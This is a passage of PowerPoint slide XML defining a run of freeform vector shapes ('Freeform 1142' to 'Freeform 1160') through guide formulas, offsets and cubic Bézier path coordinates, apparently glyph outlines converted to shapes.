                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 186 w 201"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 201 w 201"/>
                <a:gd name="T29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4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="284"/>
                    <a:pt x="192" y="284"/>
                    <a:pt x="186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1" y="0"/>
                    <a:pt x="98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1" y="21"/>
                    <a:pt x="16" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88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1" y="305"/>
                    <a:pt x="16" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="186" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="305"/>
                    <a:pt x="201" y="305"/>
                    <a:pt x="20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6" name="Freeform 1142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E92617-B5BB-435E-ADB3-E75232E4C92B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId138"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1703387" y="1595438"/>
              <a:ext cx="77788" cy="85725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7" name="Freeform 1143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68029393-13C1-4DAD-A6BB-518997D0DBE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId139"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1801812" y="1595438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4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6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4 w 232"/>
                <a:gd name="T31" fmla="*/ 153 h 220"/>
                <a:gd name="T32" fmla="*/ 131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4 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 220"/>
                <a:gd name="T40" fmla="*/ 154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8" name="Freeform 1144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B552D3DC-1F7E-4364-B31E-257D94B0AEED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1908175" y="1595438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6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9" name="Freeform 1145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA986694-AF3A-42A2-900D-E0689CF3222A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2005012" y="1595438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6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70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0" name="Freeform 1146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2E15B4-78F1-4450-AF9F-4B2CD4DB76C1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2205037" y="1595438"/>
              <a:ext cx="76200" cy="85725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1" name="Freeform 1147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18683A2F-D28F-4AB1-B81E-A13F51C96B8C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2297112" y="1597025"/>
              <a:ext cx="93663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8 h 215"/>
                <a:gd name="T8" fmla="*/ 141 w 247"/>
                <a:gd name="T9" fmla="*/ 0 h 215"/>
                <a:gd name="T10" fmla="*/ 68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4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7 h 215"/>
                <a:gd name="T40" fmla="*/ 138 w 247"/>
                <a:gd name="T41" fmla="*/ 21 h 215"/>
                <a:gd name="T42" fmla="*/ 178 w 247"/>
                <a:gd name="T43" fmla="*/ 71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8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6"/>
                    <a:pt x="68" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68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4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7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1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2" name="Freeform 1148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8047EBF-2D37-4F00-9018-5FEED8C41021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2398712" y="1573213"/>
              <a:ext cx="79375" cy="107950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8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3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49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8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8" y="279"/>
                    <a:pt x="133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3" name="Freeform 1149">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F441382F-0C71-410F-9911-F444EC279624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2505075" y="1595438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4" name="Freeform 1150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3FA1D2D-97A2-474A-8CDA-A545CF0A2EFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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2600325" y="1597025"/>
              <a:ext cx="85725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1 w 224"/>
                <a:gd name="T9" fmla="*/ 3 h 215"/>
                <a:gd name="T10" fmla="*/ 15 w 224"/>
                <a:gd name="T11" fmla="*/ 3 h 215"/>
                <a:gd name="T12" fmla="*/ 0 w 224"/>
                <a:gd name="T13" fmla="*/ 13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49 w 224"/>
                <a:gd name="T27" fmla="*/ 215 h 215"/>
                <a:gd name="T28" fmla="*/ 165 w 224"/>
                <a:gd name="T29" fmla="*/ 204 h 215"/>
                <a:gd name="T30" fmla="*/ 149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5" name="Freeform 1151">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931E1E08-7466-422C-954A-28632C9F3473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2803525" y="1595438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6" name="Freeform 1152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C49D5FB0-79C1-44D2-9E10-8FB39B121C7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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008312" y="1595438"/>
              <a:ext cx="73025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7" name="Freeform 1153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615023FA-3129-4434-84B4-5A5B213C378C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100387" y="1573213"/>
              <a:ext cx="79375" cy="107950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2 w 209"/>
                <a:gd name="T9" fmla="*/ 213 h 279"/>
                <a:gd name="T10" fmla="*/ 92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2 w 209"/>
                <a:gd name="T19" fmla="*/ 64 h 279"/>
                <a:gd name="T20" fmla="*/ 92 w 209"/>
                <a:gd name="T21" fmla="*/ 16 h 279"/>
                <a:gd name="T22" fmla="*/ 79 w 209"/>
                <a:gd name="T23" fmla="*/ 0 h 279"/>
                <a:gd name="T24" fmla="*/ 67 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 279"/>
                <a:gd name="T26" fmla="*/ 67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7 w 209"/>
                <a:gd name="T35" fmla="*/ 85 h 279"/>
                <a:gd name="T36" fmla="*/ 67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2" y="258"/>
                    <a:pt x="92" y="227"/>
                    <a:pt x="92" y="213"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92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2" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="9"/>
                    <a:pt x="92" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="0"/>
                    <a:pt x="67" y="9"/>
                    <a:pt x="67" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67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7" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="216"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67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8" name="Freeform 1154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164A483A-00E1-4FEB-AA3E-C47D0EA5404D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201987" y="1597025"/>
              <a:ext cx="85725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3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49 w 224"/>
                <a:gd name="T27" fmla="*/ 215 h 215"/>
                <a:gd name="T28" fmla="*/ 165 w 224"/>
                <a:gd name="T29" fmla="*/ 204 h 215"/>
                <a:gd name="T30" fmla="*/ 149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9" name="Freeform 1155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09BF57CD-8D0D-426B-BEED-743D074CD978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3309937" y="1562100"/>
              <a:ext cx="71438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8 w 184"/>
                <a:gd name="T5" fmla="*/ 281 h 302"/>
                <a:gd name="T6" fmla="*/ 108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0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1 h 302"/>
                <a:gd name="T38" fmla="*/ 110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3" y="281"/>
                    <a:pt x="168" y="281"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="108" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="94"/>
                    <a:pt x="106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0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0" y="302"/>
                    <a:pt x="16" y="302"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="302"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="302"/>
                    <a:pt x="184" y="302"/>
                    <a:pt x="184" y="291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="110" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="9"/>
                    <a:pt x="101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2"/>
                    <a:pt x="79" y="41"/>
                    <a:pt x="90" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="110" y="32"/>
                    <a:pt x="110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0" name="Freeform 1156">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA4A151-7BF9-4200-967F-0C61AAD551C3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3397250" y="1597025"/>
              <a:ext cx="95250" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 248 w 248"/>
                <a:gd name="T1" fmla="*/ 204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8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4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4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1 h 215"/>
                <a:gd name="T44" fmla="*/ 179 w 248"/>
                <a:gd name="T45" fmla="*/ 194 h 215"/>
                <a:gd name="T46" fmla="*/ 153 w 248"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 137 w 248"/>
                <a:gd name="T49" fmla="*/ 204 h 215"/>
                <a:gd name="T50" fmla="*/ 153 w 248"/>
                <a:gd name="T51" fmla="*/ 215 h 215"/>
                <a:gd name="T52" fmla="*/ 232 w 248"/>
                <a:gd name="T53" fmla="*/ 215 h 215"/>
                <a:gd name="T54" fmla="*/ 248 w 248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1" name="Freeform 1157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D369281-4472-4985-A898-CD5F127EB9F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3500437" y="1595438"/>
              <a:ext cx="92075" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 238 w 238"/>
                <a:gd name="T1" fmla="*/ 23 h 336"/>
                <a:gd name="T2" fmla="*/ 205 w 238"/>
                <a:gd name="T3" fmla="*/ 0 h 336"/>
                <a:gd name="T4" fmla="*/ 151 w 238"/>
                <a:gd name="T5" fmla="*/ 19 h 336"/>
                <a:gd name="T6" fmla="*/ 101 w 238"/>
                <a:gd name="T7" fmla="*/ 3 h 336"/>
                <a:gd name="T8" fmla="*/ 21 w 238"/>
                <a:gd name="T9" fmla="*/ 80 h 336"/>
                <a:gd name="T10" fmla="*/ 38 w 238"/>
                <a:gd name="T11" fmla="*/ 129 h 336"/>
                <a:gd name="T12" fmla="*/ 27 w 238"/>
                <a:gd name="T13" fmla="*/ 164 h 336"/>
                <a:gd name="T14" fmla="*/ 41 w 238"/>
                <a:gd name="T15" fmla="*/ 203 h 336"/>
                <a:gd name="T16" fmla="*/ 0 w 238"/>
                <a:gd name="T17" fmla="*/ 265 h 336"/>
                <a:gd name="T18" fmla="*/ 116 w 238"/>
                <a:gd name="T19" fmla="*/ 336 h 336"/>
                <a:gd name="T20" fmla="*/ 231 w 238"/>
                <a:gd name="T21" fmla="*/ 265 h 336"/>
                <a:gd name="T22" fmla="*/ 198 w 238"/>
                <a:gd name="T23" fmla="*/ 211 h 336"/>
                <a:gd name="T24" fmla="*/ 125 w 238"/>
                <a:gd name="T25" fmla="*/ 197 h 336"/>
                <a:gd name="T26" fmla="*/ 89 w 238"/>
                <a:gd name="T27" fmla="*/ 197 h 336"/>
                <a:gd name="T28" fmla="*/ 74 w 238"/>
                <a:gd name="T29" fmla="*/ 196 h 336"/>
                <a:gd name="T30" fmla="*/ 53 w 238"/>
                <a:gd name="T31" fmla="*/ 186 h 336"/>
                <a:gd name="T32" fmla="*/ 46 w 238"/>
                <a:gd name="T33" fmla="*/ 165 h 336"/>
                <a:gd name="T34" fmla="*/ 52 w 238"/>
                <a:gd name="T35" fmla="*/ 142 h 336"/>
                <a:gd name="T36" fmla="*/ 101 w 238"/>
                <a:gd name="T37" fmla="*/ 158 h 336"/>
                <a:gd name="T38" fmla="*/ 180 w 238"/>
                <a:gd name="T39" fmla="*/ 80 h 336"/>
                <a:gd name="T40" fmla="*/ 165 w 238"/>
                <a:gd name="T41" fmla="*/ 33 h 336"/>
                <a:gd name="T42" fmla="*/ 206 w 238"/>
                <a:gd name="T43" fmla="*/ 21 h 336"/>
                <a:gd name="T44" fmla="*/ 222 w 238"/>
                <a:gd name="T45" fmla="*/ 39 h 336"/>
                <a:gd name="T46" fmla="*/ 238 w 238"/>
                <a:gd name="T47" fmla="*/ 23 h 336"/>
                <a:gd name="T48" fmla="*/ 155 w 238"/>
                <a:gd name="T49" fmla="*/ 80 h 336"/>
                <a:gd name="T50" fmla="*/ 101 w 238"/>
                <a:gd name="T51" fmla="*/ 137 h 336"/>
                <a:gd name="T52" fmla="*/ 46 w 238"/>
                <a:gd name="T53" fmla="*/ 80 h 336"/>
                <a:gd name="T54" fmla="*/ 101 w 238"/>
                <a:gd name="T55" fmla="*/ 23 h 336"/>
                <a:gd name="T56" fmla="*/ 155 w 238"/>
                <a:gd name="T57" fmla="*/ 80 h 336"/>
                <a:gd name="T58" fmla="*/ 211 w 238"/>
                <a:gd name="T59" fmla="*/ 265 h 336"/>
                <a:gd name="T60" fmla="*/ 116 w 238"/>
                <a:gd name="T61" fmla="*/ 315 h 336"/>
                <a:gd name="T62" fmla="*/ 20 w 238"/>
                <a:gd name="T63" fmla="*/ 265 h 336"/>
                <a:gd name="T64" fmla="*/ 44 w 238"/>
                <a:gd name="T65" fmla="*/ 225 h 336"/>
                <a:gd name="T66" fmla="*/ 102 w 238"/>
                <a:gd name="T67" fmla="*/ 216 h 336"/>
                <a:gd name="T68" fmla="*/ 211 w 238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36">
                  <a:moveTo>
                    <a:pt x="238" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="13"/>
                    <a:pt x="229" y="0"/>
                    <a:pt x="205" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="0"/>
                    <a:pt x="176" y="1"/>
                    <a:pt x="151" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="12"/>
                    <a:pt x="123" y="3"/>
                    <a:pt x="101" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="21" y="39"/>
                    <a:pt x="21" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="101"/>
                    <a:pt x="29" y="116"/>
                    <a:pt x="38" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="139"/>
                    <a:pt x="27" y="150"/>
                    <a:pt x="27" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="181"/>
                    <a:pt x="33" y="192"/>
                    <a:pt x="41" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="227"/>
                    <a:pt x="0" y="260"/>
                    <a:pt x="0" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="53" y="336"/>
                    <a:pt x="116" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="336"/>
                    <a:pt x="231" y="307"/>
                    <a:pt x="231" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="248"/>
                    <a:pt x="222" y="224"/>
                    <a:pt x="198" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="207"/>
                    <a:pt x="170" y="197"/>
                    <a:pt x="125" y="197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="197"/>
                    <a:pt x="78" y="196"/>
                    <a:pt x="74" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="196"/>
                    <a:pt x="61" y="195"/>
                    <a:pt x="53" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="178"/>
                    <a:pt x="46" y="165"/>
                    <a:pt x="46" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="162"/>
                    <a:pt x="47" y="154"/>
                    <a:pt x="52" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="147"/>
                    <a:pt x="77" y="158"/>
                    <a:pt x="101" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="158"/>
                    <a:pt x="180" y="123"/>
                    <a:pt x="180" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="66"/>
                    <a:pt x="176" y="52"/>
                    <a:pt x="165" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="24"/>
                    <a:pt x="194" y="22"/>
                    <a:pt x="206" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="36"/>
                    <a:pt x="218" y="39"/>
                    <a:pt x="222" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="39"/>
                    <a:pt x="238" y="34"/>
                    <a:pt x="238" y="23"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="155" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="112"/>
                    <a:pt x="130" y="137"/>
                    <a:pt x="101" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="137"/>
                    <a:pt x="46" y="110"/>
                    <a:pt x="46" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="48"/>
                    <a:pt x="71" y="23"/>
                    <a:pt x="101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1" y="265"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="289"/>
                    <a:pt x="170" y="315"/>
                    <a:pt x="116" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="315"/>
                    <a:pt x="20" y="289"/>
                    <a:pt x="20" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="255"/>
                    <a:pt x="25" y="236"/>
                    <a:pt x="44" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="216"/>
                    <a:pt x="62" y="216"/>
                    <a:pt x="102" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="216"/>
                    <a:pt x="211" y="218"/>
                    <a:pt x="211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2" name="Freeform 1158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA45D6E1-0E88-482E-BE5B-B726DFD2C3CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3635375" y="1597025"/>
              <a:ext cx="20638" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 54"/>
                <a:gd name="T1" fmla="*/ 27 h 212"/>
                <a:gd name="T2" fmla="*/ 28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8 w 54"/>
                <a:gd name="T13" fmla="*/ 157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2" y="157"/>
                    <a:pt x="28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4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3" name="Freeform 1159">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE3A3EF-DBE9-41F8-920A-875DB888C546}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3908425" y="1579563"/>
              <a:ext cx="73025" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 189 w 189"/>
                <a:gd name="T1" fmla="*/ 153 h 212"/>
                <a:gd name="T2" fmla="*/ 186 w 189"/>
                <a:gd name="T3" fmla="*/ 144 h 212"/>
                <a:gd name="T4" fmla="*/ 115 w 189"/>
                <a:gd name="T5" fmla="*/ 107 h 212"/>
                <a:gd name="T6" fmla="*/ 179 w 189"/>
                <a:gd name="T7" fmla="*/ 72 h 212"/>
                <a:gd name="T8" fmla="*/ 189 w 189"/>
                <a:gd name="T9" fmla="*/ 59 h 212"/>
                <a:gd name="T10" fmla="*/ 175 w 189"/>
                <a:gd name="T11" fmla="*/ 47 h 212"/>
                <a:gd name="T12" fmla="*/ 106 w 189"/>
                <a:gd name="T13" fmla="*/ 87 h 212"/>
                <a:gd name="T14" fmla="*/ 107 w 189"/>
                <a:gd name="T15" fmla="*/ 17 h 212"/>
                <a:gd name="T16" fmla="*/ 95 w 189"/>
                <a:gd name="T17" fmla="*/ 0 h 212"/>
                <a:gd name="T18" fmla="*/ 83 w 189"/>
                <a:gd name="T19" fmla="*/ 17 h 212"/>
                <a:gd name="T20" fmla="*/ 83 w 189"/>
                <a:gd name="T21" fmla="*/ 88 h 212"/>
                <a:gd name="T22" fmla="*/ 15 w 189"/>
                <a:gd name="T23" fmla="*/ 48 h 212"/>
                <a:gd name="T24" fmla="*/ 12 w 189"/>
                <a:gd name="T25" fmla="*/ 47 h 212"/>
                <a:gd name="T26" fmla="*/ 0 w 189"/>
                <a:gd name="T27" fmla="*/ 59 h 212"/>
                <a:gd name="T28" fmla="*/ 9 w 189"/>
                <a:gd name="T29" fmla="*/ 71 h 212"/>
                <a:gd name="T30" fmla="*/ 74 w 189"/>
                <a:gd name="T31" fmla="*/ 106 h 212"/>
                <a:gd name="T32" fmla="*/ 10 w 189"/>
                <a:gd name="T33" fmla="*/ 141 h 212"/>
                <a:gd name="T34" fmla="*/ 0 w 189"/>
                <a:gd name="T35" fmla="*/ 153 h 212"/>
                <a:gd name="T36" fmla="*/ 14 w 189"/>
                <a:gd name="T37" fmla="*/ 165 h 212"/>
                <a:gd name="T38" fmla="*/ 83 w 189"/>
                <a:gd name="T39" fmla="*/ 125 h 212"/>
                <a:gd name="T40" fmla="*/ 83 w 189"/>
                <a:gd name="T41" fmla="*/ 196 h 212"/>
                <a:gd name="T42" fmla="*/ 95 w 189"/>
                <a:gd name="T43" fmla="*/ 212 h 212"/>
                <a:gd name="T44" fmla="*/ 107 w 189"/>
                <a:gd name="T45" fmla="*/ 196 h 212"/>
                <a:gd name="T46" fmla="*/ 107 w 189"/>
                <a:gd name="T47" fmla="*/ 126 h 212"/>
                <a:gd name="T48" fmla="*/ 161 w 189"/>
                <a:gd name="T49" fmla="*/ 158 h 212"/>
                <a:gd name="T50" fmla="*/ 177 w 189"/>
                <a:gd name="T51" fmla="*/ 165 h 212"/>
                <a:gd name="T52" fmla="*/ 189 w 189"/>
                <a:gd name="T53" fmla="*/ 15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212">
                  <a:moveTo>
                    <a:pt x="189" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="149"/>
                    <a:pt x="187" y="146"/>
                    <a:pt x="186" y="144"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="69"/>
                    <a:pt x="189" y="66"/>
                    <a:pt x="189" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="58"/>
                    <a:pt x="189" y="48"/>
                    <a:pt x="175" y="47"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="17"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="13"/>
                    <a:pt x="107" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="13"/>
                    <a:pt x="83" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="48"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="47"/>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="47"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66"/>
                    <a:pt x="4" y="68"/>
                    <a:pt x="9" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="141"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="143"/>
                    <a:pt x="0" y="147"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="165"/>
                    <a:pt x="14" y="165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="199"/>
                    <a:pt x="83" y="212"/>
                    <a:pt x="95" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="212"/>
                    <a:pt x="107" y="199"/>
                    <a:pt x="107" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="165"/>
                    <a:pt x="174" y="165"/>
                    <a:pt x="177" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="165"/>
                    <a:pt x="189" y="159"/>
                    <a:pt x="189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4" name="Freeform 1160">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F842F0CC-571F-48A6-AEF6-E44908BF2CF1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4008437" y="1579563"/>
              <a:ext cx="73025" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 190 w 190"/>
                <a:gd name="T1" fmla="*/ 153 h 212"/>
                <a:gd name="T2" fmla="*/ 186 w 190"/>
                <a:gd name="T3" fmla="*/ 144 h 212"/>
                <a:gd name="T4" fmla="*/ 116 w 190"/>
                <a:gd name="T5" fmla="*/ 107 h 212"/>
                <a:gd name="T6" fmla="*/ 180 w 190"/>
                <a:gd name="T7" fmla="*/ 72 h 212"/>
                <a:gd name="T8" fmla="*/ 190 w 190"/>
                <a:gd name="T9" fmla="*/ 59 h 212"/>
                <a:gd name="T10" fmla="*/ 176 w 190"/>
                <a:gd name="T11" fmla="*/ 47 h 212"/>
                <a:gd name="T12" fmla="*/ 107 w 190"/>
                <a:gd name="T13" fmla="*/ 87 h 212"/>
